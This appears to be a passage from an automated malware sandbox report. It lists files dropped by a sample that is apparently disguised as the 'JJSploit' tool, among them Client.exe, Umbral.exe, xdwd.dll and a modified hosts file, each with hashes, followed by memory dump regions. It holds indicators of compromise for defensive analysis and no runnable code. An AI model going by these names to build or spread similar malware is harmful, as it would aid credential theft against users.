                                                                                            3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            948B

                                                                                            MD5

                                                                                            28ef595a6cc9f47b8eccb22d4ed50d6c

                                                                                            SHA1

                                                                                            4335de707324b15eba79017938c3da2752d3eea5

                                                                                            SHA256

                                                                                            3abd14d4fe7b5697b2fa84993e7183f4fd2580be5b4e5150da15ddda5a9560b9

                                                                                            SHA512

                                                                                            687b7849faa62a4dabc240b573afa163f0cda9a80be61cebe28ef1461777744d73b465ac92d065093228068540846e79c899445057f5b906f9b9fa9868132208

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            548dd08570d121a65e82abb7171cae1c

                                                                                            SHA1

                                                                                            1a1b5084b3a78f3acd0d811cc79dbcac121217ab

                                                                                            SHA256

                                                                                            cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

                                                                                            SHA512

                                                                                            37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            d0f54ef840fcb7517c5c2259c6a854f2

                                                                                            SHA1

                                                                                            23f22cb42897ee05f63284a01bc8fbcd22ddb791

                                                                                            SHA256

                                                                                            2ef7b221d2b1f1e4e518e3f40a521757a68f83b6d6e29859d1dc9e6f0f089b72

                                                                                            SHA512

                                                                                            3b712765992835c9cf4dce74e95355a07e79d5669b4aa191f14769fbbd47570c804c1e51fca50add1919e5a4b69cc0076306c081979f4ee0fae17cff7a48cbd3

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                            Filesize

                                                                                            385KB

                                                                                            MD5

                                                                                            0f1acdee2c2f668d935b48e7c6d8a692

                                                                                            SHA1

                                                                                            a8792fd3714fdc22da8d3b66352d3bdebe6d36f3

                                                                                            SHA256

                                                                                            417a451e0de8ea0009ee297dd23efceffa261d558bb3c870699e072e8ce4c022

                                                                                            SHA512

                                                                                            3d8c2fb83250a20cf36001ed20cdd1e6fd26be939761970f424de03c61704d482a2e5e4b94e3658c7a14480ad68ce17d5938612ff87f815529c59c90f9a73811

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                            Filesize

                                                                                            232KB

                                                                                            MD5

                                                                                            93b8d535298fbf5b2b7f94067376630e

                                                                                            SHA1

                                                                                            40e3333ea1b7e5114fee66a5285cd9f9f8c40bd3

                                                                                            SHA256

                                                                                            c818950a47ab45ba792458dfced1f34dfa95d86bc4807a3bbf743ffdef37fbbe

                                                                                            SHA512

                                                                                            6333d3591261f710e3783577d90b14857b936f5daa05be7cc0b632a00e4c9bf77943d14f83acc08b7c926ccc3ec0023ccc3414ca01f3cd623d626c5e01d0a3b9

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vyhftkzg.oar.ps1
                                                                                            Filesize

                                                                                            60B

                                                                                            MD5

                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                            SHA1

                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                            SHA256

                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                            SHA512

                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\scoped_dir4560_287921883\8c5931d3-52d6-4e1b-a20e-da7c89b85e42.tmp
                                                                                            Filesize

                                                                                            150KB

                                                                                            MD5

                                                                                            14937b985303ecce4196154a24fc369a

                                                                                            SHA1

                                                                                            ecfe89e11a8d08ce0c8745ff5735d5edad683730

                                                                                            SHA256

                                                                                            71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

                                                                                            SHA512

                                                                                            1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\scoped_dir4560_287921883\CRX_INSTALL\_locales\en\messages.json
                                                                                            Filesize

                                                                                            711B

                                                                                            MD5

                                                                                            558659936250e03cc14b60ebf648aa09

                                                                                            SHA1

                                                                                            32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                                                                            SHA256

                                                                                            2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                                                                            SHA512

                                                                                            1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\Desktop\JJSploit\start.exe
                                                                                            Filesize

                                                                                            627KB

                                                                                            MD5

                                                                                            d4c6740bf2e0e0ded8f57d45a8d959da

                                                                                            SHA1

                                                                                            8fa681e5c5c96924c70231c3200ef8814e3998ed

                                                                                            SHA256

                                                                                            2b31ba21434c94dbd05e21da2b05c778f690915aadad5e1113c7655d0885ed9f

                                                                                            SHA512

                                                                                            b1b61dad73e8218a69becb9b23895ffcf9b32ecc7e6bd0d89afef5dc00005729877a8969441e477e6390e1efb795e1d7acf3f0c90522fa62e09cd640e406a74c

                                                                                            Download Submit

                                                                                          • C:\Windows\System32\drivers\etc\hosts
                                                                                            Filesize

                                                                                            2KB

                                                                                            MD5

                                                                                            4028457913f9d08b06137643fe3e01bc

                                                                                            SHA1

                                                                                            a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

                                                                                            SHA256

                                                                                            289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

                                                                                            SHA512

                                                                                            c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                                                                                            Download Submit

                                                                                          • C:\Windows\xdwd.dll
                                                                                            Filesize

                                                                                            136KB

                                                                                            MD5

                                                                                            16e5a492c9c6ae34c59683be9c51fa31

                                                                                            SHA1

                                                                                            97031b41f5c56f371c28ae0d62a2df7d585adaba

                                                                                            SHA256

                                                                                            35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

                                                                                            SHA512

                                                                                            20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

                                                                                            Download Submit

                                                                                          • memory/396-257-0x00000191FFAE0000-0x00000191FFAF2000-memory.dmp

                                                                                            Filesize

                                                                                            72KB

                                                                                            Download

                                                                                          • memory/396-218-0x00000191FFA90000-0x00000191FFAE0000-memory.dmp

                                                                                            Filesize

                                                                                            320KB

                                                                                            Download

                                                                                          • memory/396-217-0x00000191FFB10000-0x00000191FFB86000-memory.dmp

                                                                                            Filesize

                                                                                            472KB

                                                                                            Download

                                                                                          • memory/396-219-0x00000191FFA20000-0x00000191FFA3E000-memory.dmp

                                                                                            Filesize

                                                                                            120KB

                                                                                            Download

                                                                                          • memory/396-190-0x00000191FF690000-0x00000191FF6D0000-memory.dmp

                                                                                            Filesize

                                                                                            256KB

                                                                                            Download

                                                                                          • memory/396-256-0x00000191FFA00000-0x00000191FFA0A000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                            Download

                                                                                          • memory/868-192-0x000001BA16A60000-0x000001BA16A82000-memory.dmp

                                                                                            Filesize

                                                                                            136KB

                                                                                            Download

                                                                                          • memory/1604-188-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                            Filesize

                                                                                            656KB

                                                                                            Download

                                                                                          • memory/3748-189-0x00000000008D0000-0x0000000000936000-memory.dmp

                                                                                            Filesize

                                                                                            408KB

                                                                                            Download

                                                                                          • memory/4796-752-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                            Filesize

                                                                                            656KB

                                                                                            Download